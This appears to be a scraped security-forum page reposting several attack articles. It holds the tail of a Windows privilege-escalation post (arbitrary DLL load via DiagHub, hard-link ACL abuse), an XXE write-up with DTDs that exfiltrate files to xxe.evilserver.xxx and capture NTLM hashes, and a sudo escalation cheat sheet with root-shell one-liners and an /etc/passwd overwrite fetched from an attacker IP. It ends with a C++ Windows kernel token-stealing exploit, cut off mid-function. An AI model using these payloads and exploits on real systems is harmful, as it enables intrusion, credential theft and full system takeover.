                                 LOAD_WITH_ALTERED_SEARCH_PATH);
    dll_get_class_obj = GetProcAddress(mod, "DllGetClassObject");
    return dll_get_class_obj(guid);
}

We can see that it checks that the agent path is valid and returns a full path (this is where the previous EoP bugs existed: insufficient checks). This path is then loaded using LoadLibraryEx, after which the DLL is queried for the exported method DllGetClassObject, which is then called. Therefore, to easily get code execution all we need is to implement that method and drop the file into SYSTEM32. The implemented DllGetClassObject will be called outside the loader lock so we can do anything we want. The following code (error handling removed) will be sufficient to load a DLL called dummy.dll:

IStandardCollectorService* service;
CoCreateInstance(CLSID_CollectorService, nullptr, CLSCTX_LOCAL_SERVER,
                 IID_PPV_ARGS(&service));

SessionConfiguration config = {};
config.version = 1;
config.monitor_pid = ::GetCurrentProcessId();
CoCreateGuid(&config.guid);
config.path = ::SysAllocString(L"C:\\Dummy");
ICollectionSession* session;
service->CreateSession(&config, nullptr, &session);

GUID agent_guid;
CoCreateGuid(&agent_guid);
session->AddAgent(L"dummy.dll", agent_guid);

All we need now is the arbitrary file write so that we can drop a DLL into SYSTEM32, load it and elevate our privileges. 
For this I’ll demonstrate using a vulnerability I found in the SvcMoveFileInheritSecurity RPC method in the system Storage Service. This function caught my attention due to its use in an exploit for a vulnerability in ALPC discovered and presented by Clément Rouault & Thomas Imbert at PACSEC 2017. While this method was just a useful exploit primitive for the vulnerability, I realized it has not one, but two actual vulnerabilities lurking in it (at least from a normal user privilege). The code prior to any fixes for SvcMoveFileInheritSecurity looked like the following:

void SvcMoveFileInheritSecurity(LPCWSTR lpExistingFileName,
                                LPCWSTR lpNewFileName,
                                DWORD dwFlags) {
    PACL pAcl;
    if (!RpcImpersonateClient()) {
        // Move file while impersonating.
        if (MoveFileEx(lpExistingFileName, lpNewFileName, dwFlags)) {
            RpcRevertToSelf();
            // Copy inherited DACL while not.
            InitializeAcl(&pAcl, 8, ACL_REVISION);
            DWORD status = SetNamedSecurityInfo(lpNewFileName, SE_FILE_OBJECT,
                UNPROTECTED_DACL_SECURITY_INFORMATION | DACL_SECURITY_INFORMATION,
                nullptr, nullptr, &pAcl, nullptr);
            if (status != ERROR_SUCCESS)
                MoveFileEx(lpNewFileName, lpExistingFileName, dwFlags);
        }
        else {
            // Copy file instead...
            RpcRevertToSelf();
        }
    }
}

The purpose of this method seems to be to move a file and then apply any inherited ACEs to the DACL from the new directory location. This is necessary because when a file is moved on the same volume, the old filename is unlinked and the file is linked to the new location; the new file will, however, maintain the security assigned from its original location. Inherited ACEs are only applied when a new file is created in a directory, or, as in this case, when the ACEs are explicitly applied by calling a function such as SetNamedSecurityInfo. To ensure this method doesn’t allow anyone to move an arbitrary file while running as the service’s user, which in this case is Local System, the RPC caller is impersonated. 
The trouble starts immediately after the first call to MoveFileEx: the impersonation is reverted and SetNamedSecurityInfo is called. If that call fails, the code calls MoveFileEx again to try and revert the original move operation. This is the first vulnerability; it’s possible that the original filename location now points somewhere else, such as through the abuse of symbolic links. It’s pretty easy to cause SetNamedSecurityInfo to fail: just add a Deny ACE for Local System to the file’s DACL for WRITE_DAC and it’ll return an error, which causes the revert, and you get an arbitrary file creation. This was reported as issue 1427. This is not in fact the vulnerability we’ll be exploiting, as that would be too easy. Instead we’ll exploit a second vulnerability in the same code: the fact that we can get the service to call SetNamedSecurityInfo on any file we like while running as Local System. This can be achieved either by abusing the impersonated device map to redirect the local drive letter (such as C:) when doing the initial MoveFileEx, which then results in lpNewFileName pointing to an arbitrary location, or, more interestingly, by abusing hard links. This was reported as issue 1428. We can exploit this using hard links as follows: Create a hard link to a target file in SYSTEM32 that we want to overwrite. We can do this as you don’t need to have write privileges to a file to create a hard link to it, at least outside of a sandbox. Create a new directory location that has an inheritable ACE for a group such as Everyone or Authenticated Users to allow for modification of any new file. You don’t even typically need to do this explicitly; for example, any new directory created in the root of the C: drive has an inherited ACE for Authenticated Users. Then a request can be made to the RPC service to move the hardlinked file to the new directory location. 
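The first (revert) vulnerability can be illustrated outside Windows: if the original name can be repointed (here with a symlink) between the forward move and the failed-security revert, the revert drops the file into an attacker-chosen directory. A POSIX sketch of the same logic, not the actual Windows primitive:

```python
import os
import shutil
import tempfile

tmp = tempfile.mkdtemp()
orig = os.path.join(tmp, "orig.txt")       # plays lpExistingFileName
dest = os.path.join(tmp, "dest.txt")       # plays lpNewFileName
with open(orig, "w") as f:
    f.write("payload")

shutil.move(orig, dest)                    # the impersonated MoveFileEx

victim_dir = os.path.join(tmp, "victim")   # where the attacker wants the file
os.mkdir(victim_dir)
os.symlink(victim_dir, orig)               # repoint the now-free original name

# SetNamedSecurityInfo "fails", so the service reverts the move --
# but the revert now travels through the attacker's link.
shutil.move(dest, orig)
landed = os.path.exists(os.path.join(victim_dir, "dest.txt"))
```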
The move succeeds under impersonation as long as we have FILE_DELETE_CHILD access to the original location and FILE_ADD_FILE in the new location, which we can arrange. The service will now call SetNamedSecurityInfo on the moved hardlink file. SetNamedSecurityInfo will pick up the inherited ACEs from the new directory location and apply them to the hardlinked file. The reason the ACEs are applied to the hardlinked file is from the perspective of SetNamedSecurityInfo the hardlinked file is in the new location, even though the original target file we linked to was in SYSTEM32. By exploiting this we can modify the security of any file that Local System can access for WRITE_DAC access. Therefore we can modify a file in SYSTEM32, then use the DiagHub service to load it. There is a slight problem, however. The majority of files in SYSTEM32 are actually owned by the TrustedInstaller group and so cannot be modified, even by Local System. We need to find a file we can write to which isn’t owned by TrustedInstaller. Also we’d want to pick a file that won’t cause the OS install to become corrupt. We don’t care about the file’s extension as AddAgent only checks that the file exists and loads it with LoadLibraryEx. There are a number of ways we can find a suitable file, such as using the SysInternals AccessChk utility, but to be 100% certain that the Storage Service’s token can modify the file we’ll use my NtObjectManager PowerShell module (specifically its Get-AccessibleFile cmdlet, which accepts a process to do the access check from). While the module was designed for checking accessible files from a sandbox, it also works to check for files accessible by privileged services. If you run the following script as an administrator with the module installed the $files variable will contain a list of files that the Storage Service has WRITE_DAC access to. 
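The reason the ACEs land on the original SYSTEM32 file can be shown on any hard-link-capable filesystem: a hard link is a second name for the same file object, not a copy, so anything applied through the moved link applies to the original. A quick POSIX illustration of that identity:

```python
import os
import tempfile

tmp = tempfile.mkdtemp()
target = os.path.join(tmp, "target.txt")   # stand-in for the SYSTEM32 file
with open(target, "w") as f:
    f.write("original")

link = os.path.join(tmp, "link.txt")
os.link(target, link)                      # like CreateHardLink on Windows

newdir = os.path.join(tmp, "newdir")       # directory with inheritable ACEs
os.mkdir(newdir)
moved = os.path.join(newdir, "moved.txt")
os.rename(link, moved)                     # the impersonated move

# Same underlying file: security (or content) changes made through
# 'moved' are changes to 'target'.
same = os.path.samefile(target, moved)
```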
Import-Module NtObjectManager
Start-Service -Name "StorSvc"
Set-NtTokenPrivilege SeDebugPrivilege | Out-Null
$files = Use-NtObject($p = Get-NtProcess -ServiceName "StorSvc") {
    Get-AccessibleFile -Win32Path C:\Windows\system32 -Recurse `
        -MaxDepth 1 -FormatWin32Path -AccessRights WriteDac -CheckMode FilesOnly
}

Looking through the list of files I decided to pick on the file license.rtf, which contains a short license statement for Windows. The advantage of this file is that it’s very likely not to be critical to the operation of the system, so overwriting it shouldn’t cause the installation to become corrupted. So putting it all together:

Use the Storage Service vulnerability to change the security of the license.rtf file inside SYSTEM32.
Copy a DLL, which implements DllGetClassObject, over the license.rtf file.
Use the DiagHub service to load our modified license file as a DLL, get code execution as Local System and do whatever we want.

If you’re interested in seeing a fully working example, I’ve uploaded a full exploit to the original issue on the tracker.

Wrapping Up

In this blog post I’ve described a useful exploit primitive for Windows 10, which you can even use from some sandboxed environments such as Edge LPAC. Finding these sorts of primitives makes exploitation much simpler and less error-prone. Also I’ve given you a taste of how you can go about finding your own bugs in similar DCOM implementations.

Sursa: https://googleprojectzero.blogspot.ro/2018/04/windows-exploitation-tricks-exploiting.html?m=1
-
From XML External Entity to NTLM Domain Hashes
On 2 Feb, 2018 By Gianluca Baldi

During this article I will show how it is possible to obtain NTLM password hashes from a Windows web server by chaining some well-known web vulnerabilities with internal network misconfigurations. Nothing surprisingly new (there is a very good read about this topic), but this article inspired this work during one of our last penetration tests. To respect our non-disclosure agreement with the customer, the “evidences” in the article have been (poorly) “crafted” to reproduce the original behavior encountered during the tests.

Walkthrough the attack

Our target was a bunch of ASP.NET APIs exposed on the Internet, running on a Windows Server. After some tests, we found that the service was vulnerable to XXE (XXE on OWASP) due to a DNS interaction when feeding the service with XML external entities. Usually, one of the best things you can get from this kind of vulnerability (except for rare cases – like the PHP expect module that gives RCE directly) is to read files that the application server account has privileges to read. If you are lucky enough, you can simply use your external entity to retrieve the content of the file, directly putting your external entity in a field that is reflected back in the server response. Unfortunately, none of the fields in the XML could be used to retrieve the content of the file directly from the server response in our scenario, because the external entity injection caused 500 error code responses (but the entities were still parsed). This is the case where you need some out-of-band data retrieval technique to exfiltrate file contents. In few words, we need to find another way to retrieve the content of the file because we can’t see it directly in the server response: in those cases, for example, you can try to force the backend to send the file content to a server you control via an HTTP/FTP/DNS request. 
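When out-of-band exfiltration over HTTP works, the file content arrives URL-encoded in the path of the request hitting your server. A small helper for recovering it from a logged request line (the log format here is my assumption, adapt it to whatever your listener records):

```python
from urllib.parse import unquote

def recover_exfil(request_line):
    """Extract the exfiltrated payload from a 'GET /<data> HTTP/1.1' line."""
    path = request_line.split(" ")[1]
    return unquote(path.lstrip("/"))

# Example: the first lines of win.ini, as they would appear in the path.
data = recover_exfil("GET /%5Bfonts%5D%0Afor%2016-bit%20app%20support HTTP/1.1")
```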
To achieve our goal, however, we need to use an external DTD (an external XML file where you can define new entity definitions for your XML schema), because we need parametric entities in our request (and parameter-entity references are not allowed in the internal subset). We need to put our DTD in a place we control and where the server can read it, like a public host on the Internet. But no one can assure us that the vulnerable backend server, behind a load balancer, can reach our file on the public network over a useful protocol. Let’s verify this, using the Burp collaborator (and, of course, our super-sweet Handy Collaborator plugin):

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY % xxe SYSTEM "http://58bjzmpi1n4usspzku5z0h4z9qfj38.burpcollaborator.net/">%xxe;
]>
<xml></xml>

And…. This means two things: An external public server can be reached on the HTTP port, so we can proceed with the exfiltration using the external DTD. We just found a Server-Side Request Forgery (SSRF) vulnerability as well 🙂 Let’s see how we can exploit this. 
The first thing is to host our external DTD (with parametric entities) on the Internet and then request it using our XXE vulnerability via HTTP request:

File xxe.xml:

<!ENTITY % payl SYSTEM "file:///c:/windows/win.ini">
<!ENTITY % param1 "<!ENTITY % exfil SYSTEM 'http://xxe.evilserver.xxx/%payl;'>">

Request:

<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY % xxe SYSTEM "http://xxe.evilserver.xxx/exfil.dtd">%xxe;%param1;%exfil;
]>
<xml></xml>

Nice, we got the file from the server via a GET request to our host. But this technique is not very efficient: some characters in the file content can break the HTTP syntax (and the URL max length limits the file size), so not all files can be retrieved this way. A more flexible way to retrieve files is the FTP protocol (SYSTEM 'ftp://xxe.evilserver.xxx/%payl;' – supported by the .NET parser), available only if the outbound traffic on the FTP ports is not filtered by the internal network routing. The easiest way to verify this is to modify our DTD, use a tcpdump filter on our server, and see if something happens.

New exfil.dtd:

<!ENTITY % payl SYSTEM "file:///c:/windows/win.ini">
<!ENTITY % param1 "<!ENTITY % exfil SYSTEM 'ftp://xxe.evilserver.xxx/%payl;'>">

….And surprisingly: Wow, the FTP protocol isn’t filtered by outbound rules! Nice, but pretty strange… After some investigations, we found out that the backend server could reach any arbitrary port number on the Internet using the FTP or the HTTP URL schema in our XXE payload. 
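The exfiltration DTDs above differ only in the target file, the callback host, and the protocol, so generating them is mechanical. A sketch (the function name is mine):

```python
def make_exfil_dtd(target_file, callback_host, proto="ftp"):
    """Build a two-stage external DTD for out-of-band file exfiltration."""
    payl = '<!ENTITY % payl SYSTEM "file:///{}">'.format(target_file)
    param1 = ("<!ENTITY % param1 \"<!ENTITY % exfil SYSTEM "
              "'{}://{}/%payl;'>\">").format(proto, callback_host)
    return payl + "\n" + param1

dtd = make_exfil_dtd("c:/windows/win.ini", "xxe.evilserver.xxx")
```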
Another “protocol” supported by almost every XML processor is “file://”, which can be used to reference local files on the system (like we did before in our external DTD to fetch win.ini), but it can also reference files on network shares identified by UNC paths. So, what will happen if we use a URL like “file://xxe.evilserver.xxx/somefile.txt” and host a – DEFINITELY NOT ROGUE – network share on the Internet? Let’s fire up the handy Metasploit module auxiliary/server/capture/smb (you can use Responder.py as well): This module simulates an authenticated SMB service and captures the challenges (Net-NTLM hashes) issued by the clients that try to connect to it. The idea is to force the vulnerable server to connect and (hopefully) authenticate on our evil SMB server and grab the hashes. Modify our XXE payload to file://evilserver.net/funny.txt … aaaand it works! 😀 Enjoy! Sursa: https://techblog.mediaservice.net/2018/02/from-xml-external-entity-to-ntlm-domain-hashes/
-
Abusing SUDO (Linux Privilege Escalation) Published by Touhid Shaikh on April 11, 2018

If you have a limited shell that has access to some programs via the sudo command, you might be able to escalate your privileges. Here I show some of the binaries which help you escalate privileges using the sudo command. But before the privilege escalation, let's understand the sudoers file syntax and what the sudo command is ;).

Index
What is SUDO?
Sudoers File Syntax.
Exploiting SUDO users
/usr/bin/find /usr/bin/nano /usr/bin/vim /usr/bin/man /usr/bin/awk /usr/bin/less /usr/bin/nmap ( –interactive and –script method) /bin/more /usr/bin/wget /usr/sbin/apache2

What is SUDO??

The SUDO (Substitute User and Do) command allows users to delegate privileges, with activity logging. In other words, users can execute commands as root (or another user) using their own password instead of root's, or with no password at all, depending on the sudoers settings. The rules governing the decisions about granting access can be found in the /etc/sudoers file.

Sudoers File Syntax.

root ALL=(ALL) ALL

Explain 1: The root user can execute from ALL terminals, acting as ALL (any) users, and run ALL (any) commands. The first part is the user, the second is the terminal from which the user can use the sudo command, the third part is which users he may act as, and the last one is which commands he may run when using sudo.

touhid ALL= /sbin/poweroff

Explain 2: The above rule lets the user touhid, from any terminal, run the command poweroff using touhid's own password.

touhid ALL = (root) NOPASSWD: /usr/bin/find

Explain 3: The above rule lets the user touhid, from any terminal, run the command find as the root user without a password.

Exploiting SUDO Users.

To exploit a sudo user you need to find which commands are allowed:

sudo -l

The above command shows which commands the current user is allowed to run. 
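The rule forms explained above — user, host, optional (runas), optional tag, command — can be split apart mechanically. A rough parser for the simple single-line forms shown here (not a full sudoers grammar, which also has aliases, host lists, and more tags):

```python
import re

def parse_sudoers_line(line):
    """Split a simple sudoers rule into user/host/runas/tag/commands."""
    m = re.match(
        r"(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*"   # user and host, around '='
        r"(?:\((?P<runas>[^)]*)\)\s*)?"           # optional (runas) spec
        r"(?:(?P<tag>NOPASSWD|PASSWD):\s*)?"      # optional tag
        r"(?P<cmds>.+)",                          # the command list
        line)
    return m.groupdict() if m else None

rule = parse_sudoers_line("touhid ALL = (root) NOPASSWD: /usr/bin/find")
```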
Here sudo -l shows that the user is allowed to run all of these binaries as the root user without a password. Let's take a look at the binaries one by one (those mentioned in the index) and escalate privileges to the root user.

Using Find Command
sudo find /etc/passwd -exec /bin/sh \;
or
sudo find /bin -name nano -exec /bin/sh \;

Using Vim Command
sudo vim -c '!sh'

Using Nmap Command
Old way.
sudo nmap --interactive
nmap> !sh
sh-4.1#
Note: the nmap --interactive option is not available in the latest nmap.
Latest way, without --interactive:
echo "os.execute('/bin/sh')" > /tmp/shell.nse && sudo nmap --script=/tmp/shell.nse

Using Man Command
sudo man man
after that press !sh and hit enter

Using Less/More Command
sudo less /etc/hosts
sudo more /etc/hosts
after that press !sh and hit enter

Using awk Command
sudo awk 'BEGIN {system("/bin/sh")}'

Using nano Command
nano is a text editor; using this editor you can modify the passwd file and add a user with root privileges, after which you need to switch user. Add this line to /etc/passwd in order to add a user with root privileges:
touhid:$6$bxwJfzor$MUhUWO0MUgdkWfPPEydqgZpm.YtPMI/gaM4lVqhP21LFNWmSJ821kvJnIyoODYtBh.SF9aR7ciQBRCcw5bgjX0:0:0:root:/root:/bin/bash
sudo nano /etc/passwd
now switch user; the password is: test
su touhid

Using wget Command
This is a very cool way which requires a web server to download a file. I never saw this way anywhere else, so let me explain it.
On the attacker side:
First copy the target's /etc/passwd file to the attacker machine. Modify the file and add a user with root privileges, as in the previous step; append this line only => touhid:$6$bxwJfzor$MUhUWO0MUgdkWfPPEydqgZpm.YtPMI/gaM4lVqhP21LFNWmSJ821kvJnIyoODYtBh.SF9aR7ciQBRCcw5bgjX0:0:0:root:/root:/bin/bash
Host that passwd file using any web server.
On the victim side:
sudo wget http://192.168.56.1:8080/passwd -O /etc/passwd
now switch user; the password is: test
su touhid

Using apache Command
Sadly, you can't get a shell and can't edit system files, 
but using this you can view system files.

sudo apache2 -f /etc/shadow

The output is like this:

Syntax error on line 1 of /etc/shadow: Invalid command 'root:$6$bxwJfzor$MUhUWO0MUgdkWfPPEydqgZpm.YtPMI/gaM4lVqhP21LFNWmSJ821kvJnIyoODYtBh.SF9aR7ciQBRCcw5bgjX0:17298:0:99999:7:::', perhaps misspelled or defined by a module not included in the server configuration

Sadly, no shell. But you managed to extract the root hash; now crack the hash on your machine. For shadow cracking, click here for more.

Sursa: http://touhidshaikh.com/blog/?p=790
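Returning to the passwd-overwrite technique above: the injected line is just a seven-field passwd record where the uid and gid of 0 do the real work. A helper for building one (the hash argument must be a crypt hash you generated yourself; the placeholder below is not a real hash of "test"):

```python
def make_passwd_entry(user, pw_hash, shell="/bin/bash"):
    """Build a passwd(5) line granting uid 0 / gid 0 to `user`."""
    # Fields: name, password hash, uid, gid, GECOS, home, shell.
    fields = [user, pw_hash, "0", "0", "root", "/root", shell]
    return ":".join(fields)

entry = make_passwd_entry("touhid", "$6$placeholder$notarealhash")
```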
-
#include <Windows.h>
#include <wingdi.h>
#include <iostream>
#include <Psapi.h>

#pragma comment(lib, "psapi.lib")

#define POCDEBUG 0

#if POCDEBUG == 1
#define POCDEBUG_BREAK() getchar()
#elif POCDEBUG == 2
#define POCDEBUG_BREAK() DebugBreak()
#else
#define POCDEBUG_BREAK()
#endif

static HBITMAP hBmpHunted = NULL;
static HBITMAP hBmpExtend = NULL;
static DWORD iMemHunted = NULL;
static PDWORD pBmpHunted = NULL;

CONST LONG maxCount = 0x6666667;
CONST LONG maxLimit = 0x04E2000;
CONST LONG maxTimes = 4000;
CONST LONG tmpTimes = 5500;

static POINT point[maxCount] = { 0, 0 };
static HBITMAP hbitmap[maxTimes] = { NULL };
static HACCEL hacctab[tmpTimes] = { NULL };

CONST LONG iExtHeight = 948;
CONST LONG iExtpScan0 = 951;

static VOID xxCreateClipboard(DWORD Size)
{
    PBYTE Buffer = (PBYTE)malloc(Size);
    FillMemory(Buffer, Size, 0x41);
    Buffer[Size - 1] = 0x00;
    HGLOBAL hMem = GlobalAlloc(GMEM_MOVEABLE, (SIZE_T)Size);
    CopyMemory(GlobalLock(hMem), Buffer, (SIZE_T)Size);
    GlobalUnlock(hMem);
    SetClipboardData(CF_TEXT, hMem);
}

static BOOL xxPoint(LONG id, DWORD Value)
{
    LONG iLeng = 0x00;
    pBmpHunted[id] = Value;
    iLeng = SetBitmapBits(hBmpHunted, 0x1000, pBmpHunted);
    if (iLeng < 0x1000) {
        return FALSE;
    }
    return TRUE;
}

static BOOL xxPointToHit(LONG addr, PVOID pvBits, DWORD cb)
{
    LONG iLeng = 0;
    pBmpHunted[iExtpScan0] = addr;
    iLeng = SetBitmapBits(hBmpHunted, 0x1000, pBmpHunted);
    if (iLeng < 0x1000) {
        return FALSE;
    }
    iLeng = SetBitmapBits(hBmpExtend, cb, pvBits);
    if (iLeng < (LONG)cb) {
        return FALSE;
    }
    return TRUE;
}

static BOOL xxPointToGet(LONG addr, PVOID pvBits, DWORD cb)
{
    LONG iLeng = 0;
    pBmpHunted[iExtpScan0] = addr;
    iLeng = SetBitmapBits(hBmpHunted, 0x1000, pBmpHunted);
    if (iLeng < 0x1000) {
        return FALSE;
    }
    iLeng = GetBitmapBits(hBmpExtend, cb, pvBits);
    if (iLeng < (LONG)cb) {
        return FALSE;
    }
    return TRUE;
}

static VOID xxInitPoints(VOID)
{
    for (LONG i = 0; i < maxCount; i++) {
        point[i].x = (i % 2) + 1;
        point[i].y = 100;
    }
    for (LONG i = 0; i < 75; i++) {
        point[i].y = i + 1;
    }
}

static BOOL xxDrawPolyLines(HDC hdc)
{
    for (LONG i = maxCount; i > 0; i -= min(maxLimit, i)) {
        // std::cout << ":" << (PVOID)i << std::endl;
        if (!PolylineTo(hdc, &point[maxCount - i], min(maxLimit, i))) {
            return FALSE;
        }
    }
    return TRUE;
}

static BOOL xxCreateBitmaps(INT nWidth, INT Height, UINT nbitCount)
{
    POCDEBUG_BREAK();
    for (LONG i = 0; i < maxTimes; i++) {
        hbitmap[i] = CreateBitmap(nWidth, Height, 1, nbitCount, NULL);
        if (hbitmap[i] == NULL) {
            return FALSE;
        }
    }
    return TRUE;
}

static BOOL xxCreateAcceleratorTables(VOID)
{
    POCDEBUG_BREAK();
    for (LONG i = 0; i < tmpTimes; i++) {
        ACCEL acckey[0x0D] = { 0 };
        hacctab[i] = CreateAcceleratorTableA(acckey, 0x0D);
        if (hacctab[i] == NULL) {
            return FALSE;
        }
    }
    return TRUE;
}

static BOOL xxDeleteBitmaps(VOID)
{
    BOOL bReturn = FALSE;
    POCDEBUG_BREAK();
    for (LONG i = 0; i < maxTimes; i++) {
        bReturn = DeleteObject(hbitmap[i]);
        hbitmap[i] = NULL;
    }
    return bReturn;
}

static VOID xxCreateClipboards(VOID)
{
    POCDEBUG_BREAK();
    for (LONG i = 0; i < maxTimes; i++) {
        xxCreateClipboard(0xB5C);
    }
}

static BOOL xxDigHoleInAcceleratorTables(LONG b, LONG e)
{
    BOOL bReturn = FALSE;
    for (LONG i = b; i < e; i++) {
        bReturn = DestroyAcceleratorTable(hacctab[i]);
        hacctab[i] = NULL;
    }
    return bReturn;
}

static VOID xxDeleteAcceleratorTables(VOID)
{
    for (LONG i = 0; i < tmpTimes; i++) {
        if (hacctab[i] == NULL) {
            continue;
        }
        DestroyAcceleratorTable(hacctab[i]);
        hacctab[i] = NULL;
    }
}

static BOOL xxRetrieveBitmapBits(VOID)
{
    pBmpHunted = static_cast<PDWORD>(malloc(0x1000));
    ZeroMemory(pBmpHunted, 0x1000);
    LONG index = -1;
    LONG iLeng = -1;
    POCDEBUG_BREAK();
    for (LONG i = 0; i < maxTimes; i++) {
        iLeng = GetBitmapBits(hbitmap[i], 0x1000, pBmpHunted);
        if (iLeng < 0x2D0) {
            continue;
        }
        index = i;
        std::cout << "LOCATE: " << '[' << i << ']' << hbitmap[i] << std::endl;
        hBmpHunted = hbitmap[i];
        break;
    }
    if (index == -1) {
        std::cout << "FAILED: " << (PVOID)(-1) << std::endl;
        return FALSE;
    }
    return TRUE;
}

static BOOL xxGetExtendPalette(VOID)
{
    PVOID pBmpExtend = malloc(0x1000);
    LONG index = -1;
    POCDEBUG_BREAK();
    for (LONG i = 0; i < maxTimes; i++) {
        if (hbitmap[i] == hBmpHunted) {
            continue;
        }
        if (GetBitmapBits(hbitmap[i], 0x1000, pBmpExtend) < 0x2D0) {
            continue;
        }
        index = i;
        std::cout << "LOCATE: " << '[' << i << ']' << hbitmap[i] << std::endl;
        hBmpExtend = hbitmap[i];
        break;
    }
    free(pBmpExtend);
    pBmpExtend = NULL;
    if (index == -1) {
        std::cout << "FAILED: " << (PVOID)(-1) << std::endl;
        return FALSE;
    }
    return TRUE;
}

static VOID xxOutputBitmapBits(VOID)
{
    POCDEBUG_BREAK();
    for (LONG i = 0; i < 0x1000 / sizeof(DWORD); i++) {
        std::cout << '[';
        std::cout.fill('0');
        std::cout.width(4);
        std::cout << i << ']' << (PVOID)pBmpHunted[i];
        if (((i + 1) % 4) != 0) {
            std::cout << " ";
        }
        else {
            std::cout << std::endl;
        }
    }
    std::cout.width(0);
}

static BOOL xxFixHuntedPoolHeader(VOID)
{
    DWORD szInputBit[0x100] = { 0 };
    CONST LONG iTrueCbdHead = 205;
    CONST LONG iTrueBmpHead = 937;
    szInputBit[0] = pBmpHunted[iTrueCbdHead + 0];
    szInputBit[1] = pBmpHunted[iTrueCbdHead + 1];
    BOOL bReturn = FALSE;
    bReturn = xxPointToHit(iMemHunted + 0x000, szInputBit, 0x08);
    if (!bReturn) {
        return FALSE;
    }
    szInputBit[0] = pBmpHunted[iTrueBmpHead + 0];
    szInputBit[1] = pBmpHunted[iTrueBmpHead + 1];
    bReturn = xxPointToHit(iMemHunted + 0xb70, szInputBit, 0x08);
    if (!bReturn) {
        return FALSE;
    }
    return TRUE;
}

static BOOL xxFixHuntedBitmapObject(VOID)
{
    DWORD szInputBit[0x100] = { 0 };
    szInputBit[0] = (DWORD)hBmpHunted;
    BOOL bReturn = FALSE;
    bReturn = xxPointToHit(iMemHunted + 0xb78, szInputBit, 0x04);
    if (!bReturn) {
        return FALSE;
    }
    bReturn = xxPointToHit(iMemHunted + 0xb8c, szInputBit, 0x04);
    if (!bReturn) {
        return FALSE;
    }
    return TRUE;
}

static DWORD_PTR xxGetNtoskrnlAddress(VOID)
{
    DWORD_PTR AddrList[500] = { 0 };
    DWORD cbNeeded = 0;
    EnumDeviceDrivers((LPVOID *)&AddrList, sizeof(AddrList), &cbNeeded);
    return AddrList[0];
}

static DWORD_PTR xxGetSysPROCESS(VOID)
{
    DWORD_PTR Module = 0x00;
    DWORD_PTR NtAddr = 0x00;
    Module = (DWORD_PTR)LoadLibraryA("ntkrnlpa.exe");
    NtAddr = (DWORD_PTR)GetProcAddress((HMODULE)Module, "PsInitialSystemProcess");
    FreeLibrary((HMODULE)Module);
    NtAddr = NtAddr - Module;
    Module = xxGetNtoskrnlAddress();
    if (Module == 0x00) {
        return 0x00;
    }
    NtAddr = NtAddr + Module;
    if (!xxPointToGet(NtAddr, &NtAddr, sizeof(DWORD_PTR))) {
        return 0x00;
    }
    return NtAddr;
}

CONST LONG off_EPROCESS_UniqueProId = 0x0b4;
CONST LONG off_EPROCESS_ActiveLinks = 0x0b8;

static DWORD_PTR xxGetTarPROCESS(DWORD_PTR SysPROC)
{
    if (SysPROC == 0x00) {
        return 0x00;
    }
    DWORD_PTR point = SysPROC;
    DWORD_PTR value = 0x00;
    do {
        value = 0x00;
        xxPointToGet(point + off_EPROCESS_UniqueProId, &value, sizeof(DWORD_PTR));
        if (value == 0x00) {
            break;
        }
        if (value == GetCurrentProcessId()) {
            return point;
        }
        value = 0x00;
        xxPointToGet(point + off_EPROCESS_ActiveLinks, &value, sizeof(DWORD_PTR));
        if (value == 0x00) {
            break;
        }
        point = value - off_EPROCESS_ActiveLinks;
        if (point == SysPROC) {
            break;
        }
    } while (TRUE);
    return 0x00;
}

CONST LONG off_EPROCESS_Token = 0x0f8;

static DWORD_PTR dstToken = 0x00;
static DWORD_PTR srcToken = 0x00;

static BOOL xxModifyTokenPointer(DWORD_PTR dstPROC, DWORD_PTR srcPROC)
{
    if (dstPROC == 0x00 || srcPROC == 0x00) {
        return FALSE;
    }
    // get target process original token pointer
    xxPointToGet(dstPROC + off_EPROCESS_Token, &dstToken, sizeof(DWORD_PTR));
    if (dstToken == 0x00) {
        return FALSE;
    }
    // get system process token pointer
    xxPointToGet(srcPROC + off_EPROCESS_Token, &srcToken, sizeof(DWORD_PTR));
    if (srcToken == 0x00) {
        return FALSE;
    }
    // modify target process token pointer to system
    xxPointToHit(dstPROC + off_EPROCESS_Token, &srcToken, sizeof(DWORD_PTR));
    // just test if the modification is successful
    DWORD_PTR tmpToken = 0x00;
    xxPointToGet(dstPROC + off_EPROCESS_Token, &tmpToken, sizeof(DWORD_PTR));
    if (tmpToken != srcToken) {
        return FALSE;
    }
    return TRUE;
}

static BOOL xxRecoverTokenPointer(DWORD_PTR dstPROC, DWORD_PTR srcPROC)
{
    if (dstPROC == 0x00 || srcPROC == 0x00) {
        return FALSE;
    }
    if (dstToken == 0x00 || srcToken == 0x00) {
        return FALSE;
    }
    // recover the original token pointer to target process
    xxPointToHit(dstPROC + off_EPROCESS_Token, &dstToken, sizeof(DWORD_PTR));
    return TRUE;
}

static VOID xxCreateCmdLineProcess(VOID)
{
    STARTUPINFO si = { sizeof(si) };
    PROCESS_INFORMATION pi = { 0 };
    si.dwFlags = STARTF_USESHOWWINDOW;
    si.wShowWindow = SW_SHOW;
    WCHAR wzFilePath[MAX_PATH] = { L"cmd.exe" };
    BOOL bReturn = CreateProcessW(NULL, wzFilePath, NULL, NULL, FALSE,
        CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi);
    if (bReturn)
        CloseHandle(pi.hThread), CloseHandle(pi.hProcess);
}

static VOID xxPrivilegeElevation(VOID)
{
    BOOL bReturn = FALSE;
    do {
        DWORD SysPROC = 0x0;
        DWORD TarPROC = 0x0;
        POCDEBUG_BREAK();
        SysPROC = xxGetSysPROCESS();
        if (SysPROC == 0x00) {
            break;
        }
        std::cout << "SYSTEM PROCESS: " << (PVOID)SysPROC << std::endl;
        POCDEBUG_BREAK();
        TarPROC = xxGetTarPROCESS(SysPROC);
        if (TarPROC == 0x00) {
            break;
        }
        std::cout << "TARGET PROCESS: " << (PVOID)TarPROC << std::endl;
        POCDEBUG_BREAK();
        bReturn = xxModifyTokenPointer(TarPROC, SysPROC);
        if (!bReturn) {
            break;
        }
        std::cout << "MODIFIED TOKEN TO SYSTEM!" << std::endl;
        std::cout << "CREATE NEW CMDLINE PROCESS..." << std::endl;
        POCDEBUG_BREAK();
        xxCreateCmdLineProcess();
        POCDEBUG_BREAK();
        std::cout << "RECOVER TOKEN..." << std::endl;
        bReturn = xxRecoverTokenPointer(TarPROC, SysPROC);
        if (!bReturn) {
            break;
        }
        bReturn = TRUE;
    } while (FALSE);
    if (!bReturn) {
